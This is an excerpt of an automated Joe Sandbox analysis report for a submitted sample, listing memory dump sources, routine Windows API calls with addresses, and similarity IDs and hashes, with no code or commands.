Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: Heap$AllocAllocate_free
• String ID:
• API String ID: 2447670028-0
APIs
• GetCurrentProcess.KERNEL32(?,?), ref: 009110AB
• GetProcessAffinityMask.KERNEL32(00000000), ref: 009110B2
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: Process$AffinityCurrentMask
• String ID:
• API String ID: 1231390398-0
APIs
• SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0090A325,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A501
  • Part of subcall function 0090BB03: _wcslen.LIBCMT ref: 0090BB27
• SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0090A325,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A532
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AttributesFile$_wcslen
• String ID:
• API String ID: 2673547680-0
APIs
• DeleteFileW.KERNELBASE(000000FF,?,?,0090977F,?,?,009095CF,?,?,?,?,?,00932641,000000FF), ref: 0090A1F1
  • Part of subcall function 0090BB03: _wcslen.LIBCMT ref: 0090BB27
• DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0090977F,?,?,009095CF,?,?,?,?,?,00932641), ref: 0090A21F
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: DeleteFile$_wcslen
• String ID:
• API String ID: 2643169976-0
APIs
• GdiplusShutdown.GDIPLUS(?,?,?,?,00932641,000000FF), ref: 0091ACB0
• CoUninitialize.COMBASE(?,?,?,?,00932641,000000FF), ref: 0091ACB5
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
Similarity
• API ID: GdiplusShutdownUninitialize
• String ID:
• API String ID: 3856339756-0
APIs
• GetFileAttributesW.KERNELBASE(?,?,?,0090A23A,?,0090755C,?,?,?,?), ref: 0090A254
  • Part of subcall function 0090BB03: _wcslen.LIBCMT ref: 0090BB27
• GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0090A23A,?,0090755C,?,?,?,?), ref: 0090A280
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
Similarity
• API ID: AttributesFile$_wcslen
• String ID:
• API String ID: 2673547680-0
APIs
• _swprintf.LIBCMT ref: 0091DEEC
  • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
• SetDlgItemTextW.USER32(00000065,?), ref: 0091DF03
  • Part of subcall function 0091B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0091B579
  • Part of subcall function 0091B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0091B58A
  • Part of subcall function 0091B568: IsDialogMessageW.USER32(00010464,?), ref: 0091B59E
  • Part of subcall function 0091B568: TranslateMessage.USER32(?), ref: 0091B5AC
  • Part of subcall function 0091B568: DispatchMessageW.USER32(?), ref: 0091B5B6
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
Similarity
• API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
• String ID:
• API String ID: 2718869927-0
APIs
• GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00910836
• LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0090F2D8,Crypt32.dll,00000000,0090F35C,?,?,0090F33E,?,?,?), ref: 00910858
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
Similarity
• API ID: DirectoryLibraryLoadSystem
• String ID:
• API String ID: 1175261203-0
APIs
• GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0091A3DA
• GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0091A3E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
Similarity
• API ID: BitmapCreateFromGdipStream
• String ID:
• API String ID: 1918208029-0
APIs
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00922BAA
• ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00922BB5
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
Similarity
• API ID: Value___vcrt____vcrt_uninitialize_ptd
• String ID:
• API String ID: 1660781231-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
Similarity
• API ID: ItemShowWindow
• String ID:
• API String ID: 3351165006-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00908289
                                                                                                    • Part of subcall function 009013DC: __EH_prolog.LIBCMT ref: 009013E1
                                                                                                    • Part of subcall function 0090A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0090A598
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog$CloseFind
                                                                                                  • String ID:
                                                                                                  • API String ID: 2506663941-0
                                                                                                  • Opcode ID: aea9129082cb326d683de6396d7a9c117e792b942bac48baad3156dcce86baac
                                                                                                  • Instruction ID: fd1c75ce9b63b05c5240ec249da3f9fcc6f98f53b68693e716391c15cb8c7bed
                                                                                                  • Opcode Fuzzy Hash: aea9129082cb326d683de6396d7a9c117e792b942bac48baad3156dcce86baac
                                                                                                  • Instruction Fuzzy Hash: 8E419471A446589EDB20DB60CC55BEAB3BCAF80704F4404EAE18A970D3EB755EC5CB50
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 009013E1
                                                                                                    • Part of subcall function 00905E37: __EH_prolog.LIBCMT ref: 00905E3C
                                                                                                    • Part of subcall function 0090CE40: __EH_prolog.LIBCMT ref: 0090CE45
                                                                                                    • Part of subcall function 0090B505: __EH_prolog.LIBCMT ref: 0090B50A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID:
                                                                                                  • API String ID: 3519838083-0
                                                                                                  • Opcode ID: 61ef8cc7ee7ff625bc3d80ec3d62edf2a2c2295065f53d1ab23a2c8437810b17
                                                                                                  • Instruction ID: 30e40a04f336c2f2e6e92344bd6fe7452aaeb86d50698359ddfdc516faa90334
                                                                                                  • Opcode Fuzzy Hash: 61ef8cc7ee7ff625bc3d80ec3d62edf2a2c2295065f53d1ab23a2c8437810b17
                                                                                                  • Instruction Fuzzy Hash: B7415BB0905B449EE724CF398885AE7FBE5BF19300F50492EE5FE87292CB716694CB10
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 009013E1
                                                                                                    • Part of subcall function 00905E37: __EH_prolog.LIBCMT ref: 00905E3C
                                                                                                    • Part of subcall function 0090CE40: __EH_prolog.LIBCMT ref: 0090CE45
                                                                                                    • Part of subcall function 0090B505: __EH_prolog.LIBCMT ref: 0090B50A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID:
                                                                                                  • API String ID: 3519838083-0
                                                                                                  • Opcode ID: 8c3235e631f817e2f95c764b68366b40b1d4695c129f537b6e3dd3b04b53007d
                                                                                                  • Instruction ID: c68780df6e352518065d2a5850b999e088fc2809d78f3c4695730b0bbd370b19
                                                                                                  • Opcode Fuzzy Hash: 8c3235e631f817e2f95c764b68366b40b1d4695c129f537b6e3dd3b04b53007d
                                                                                                  • Instruction Fuzzy Hash: 724147B0905B449EE724DF798885AE6FBE5BF19300F50492EE5FE83282CB716694CB10
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 0091B098
                                                                                                    • Part of subcall function 009013DC: __EH_prolog.LIBCMT ref: 009013E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID:
                                                                                                  • API String ID: 3519838083-0
                                                                                                  • Opcode ID: 39f9937a7dc5dc102b2726b9d212c2b794f38f8ac66a06e97080e422599caec0
                                                                                                  • Instruction ID: d05c82f633e3c31233310168b11f694da44cdf9ddf2890bc2760a2034ff46e2b
                                                                                                  • Opcode Fuzzy Hash: 39f9937a7dc5dc102b2726b9d212c2b794f38f8ac66a06e97080e422599caec0
                                                                                                  • Instruction Fuzzy Hash: 78319C71D04249AFCF15DFA4D851AEEBBB8AF49300F10449EE809B7282D735AE44CBA1
                                                                                                  APIs
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0092ACF8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc
                                                                                                  • String ID:
                                                                                                  • API String ID: 190572456-0
                                                                                                  • Opcode ID: 99c41e50cb658954da94e400647c484ada8daa1ba3af6e8f82ea4264f02fd2a4
                                                                                                  • Instruction ID: 8963dd878e241b8a18bf653bc31c3cd64350946d83b6d2ac3a0a6bb840fa0588
                                                                                                  • Opcode Fuzzy Hash: 99c41e50cb658954da94e400647c484ada8daa1ba3af6e8f82ea4264f02fd2a4
                                                                                                  • Instruction Fuzzy Hash: 27110633A046359F9B26DE2CFC4095A739AAB843607164621FC55EB398D734EC019BD2
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID:
                                                                                                  • API String ID: 3519838083-0
                                                                                                  • Opcode ID: f4e2f7759e61d644996e8515a60549f6cd6f64058ddd707a1261c7133a96a3e5
                                                                                                  • Instruction ID: 5547ab84f347831a14221e969a513c4be909df0dcc4f13de66309d98e53513c8
                                                                                                  • Opcode Fuzzy Hash: f4e2f7759e61d644996e8515a60549f6cd6f64058ddd707a1261c7133a96a3e5
                                                                                                  • Instruction Fuzzy Hash: D2016533D01568AFCF15ABACCD81ADEB776AFC8750F014515F826BB292DA348D04C6A0
                                                                                                  APIs
                                                                                                    • Part of subcall function 0092B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00929813,00000001,00000364,?,00923F73,00000050,?,00941030,00000200), ref: 0092B177
                                                                                                  • _free.LIBCMT ref: 0092C4E5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 614378929-0
                                                                                                  • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                  • Instruction ID: e9591bbf4c3f7a911cc378976c045c49dc24e49deb3a872e4668cadd26feb9e3
                                                                                                  • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                  • Instruction Fuzzy Hash: 000126B22003156BE3319E65A885A6AFBECEBC9330F25091DE184832C1EA30A905C724
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00929813,00000001,00000364,?,00923F73,00000050,?,00941030,00000200), ref: 0092B177
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 2b95c73ae1def8af03eb404e813522b1849938ea0d6b8f828077dcee397b5c18
                                                                                                  • Instruction ID: 05bc4011aecc52a6b4e8b7c72620376021f5b192c6fa2ba636af49134aa09b7a
                                                                                                  • Opcode Fuzzy Hash: 2b95c73ae1def8af03eb404e813522b1849938ea0d6b8f828077dcee397b5c18
                                                                                                  • Instruction Fuzzy Hash: D1F0B43250D53567EB215B22BC16B5F77CCAB81770B18C111F808AA19ACB60D92186E0
                                                                                                  APIs
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00923C3F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0092CA2C,00000000,?,00926CBE,?,00000008,?,009291E0,?,?,?), ref: 00928E38
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00905AC2
                                                                                                    • Part of subcall function 0090B505: __EH_prolog.LIBCMT ref: 0090B50A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  APIs
                                                                                                    • Part of subcall function 0090A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0090A592,000000FF,?,?), ref: 0090A6C4
                                                                                                    • Part of subcall function 0090A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0090A592,000000FF,?,?), ref: 0090A6F2
                                                                                                    • Part of subcall function 0090A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0090A592,000000FF,?,?), ref: 0090A6FE
                                                                                                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0090A598
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                                                  APIs
                                                                                                  • SetThreadExecutionState.KERNEL32(00000001), ref: 00910E3D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: ExecutionStateThread
                                                                                                  APIs
                                                                                                  • GdipAlloc.GDIPLUS(00000010), ref: 0091A62C
                                                                                                    • Part of subcall function 0091A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0091A3DA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                  APIs
                                                                                                  • DloadProtectSection.DELAYIMP ref: 0091E5E3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: DloadProtectSection
                                                                                                  APIs
                                                                                                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00911B3E), ref: 0091DD92
                                                                                                    • Part of subcall function 0091B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0091B579
                                                                                                    • Part of subcall function 0091B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0091B58A
                                                                                                    • Part of subcall function 0091B568: IsDialogMessageW.USER32(00010464,?), ref: 0091B59E
                                                                                                    • Part of subcall function 0091B568: TranslateMessage.USER32(?), ref: 0091B5AC
                                                                                                    • Part of subcall function 0091B568: DispatchMessageW.USER32(?), ref: 0091B5B6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                  APIs
                                                                                                  • GetFileType.KERNELBASE(000000FF,009097BE), ref: 009098C8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: FileType
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 74f42286a99e15789307dfe3db42c5155d15774dd62a2021d1797e01ccd18b9f
                                                                                                  • Instruction ID: bfc83f53af5226dae21513b2a4ad5de023be5f56fede3d264455cd04fd86a283
                                                                                                  • Opcode Fuzzy Hash: 74f42286a99e15789307dfe3db42c5155d15774dd62a2021d1797e01ccd18b9f
                                                                                                  • Instruction Fuzzy Hash: 4DB012D575C204BC310411551D06CB7011CD4C3B10330C83EFC02D0480D840AC811831
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
